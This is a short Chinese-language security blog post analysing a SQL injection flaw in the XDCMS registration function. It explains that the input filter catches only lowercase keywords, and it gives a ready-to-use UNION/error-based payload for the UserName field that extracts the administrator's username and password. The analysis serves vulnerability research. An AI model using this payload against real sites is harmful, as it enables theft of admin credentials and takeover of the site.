红日攻防实验室

红日攻防实验室



xdcms注册用户处SQL注入漏洞分析

最新版XDCMS企业管理系统,由于过滤不严,可绕过限制,导致多处SQL注入
注入在XDCMS企业管理系统的注册功能处,来看看systemmodulesmemberindex.php文件:
注册时会调用register_save,问题就出在index.php的register_save函数处:
1.png

2.png

3.png

第一处sql注入,注册一个用户,然后抓包:
4.jpg

最后看看结果,成功拿到了管理的用户名密码:
5.jpg

在safe_html处虽然过了个SQL注入的敏感词,还过滤了=和,但是没有考虑SQL注入敏感词的大小写,这里只过滤了小写,那么我们用大写绕过,这里过滤的=和,我们可以使用不带*和=的常规保存SQL注入语句,EXP如下:
在UserName处输入:
‘ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT
count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM
c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#

作者:xfkxfk

 标签: none

作者  :  redBu11



关于我

about me

redBu11

联系我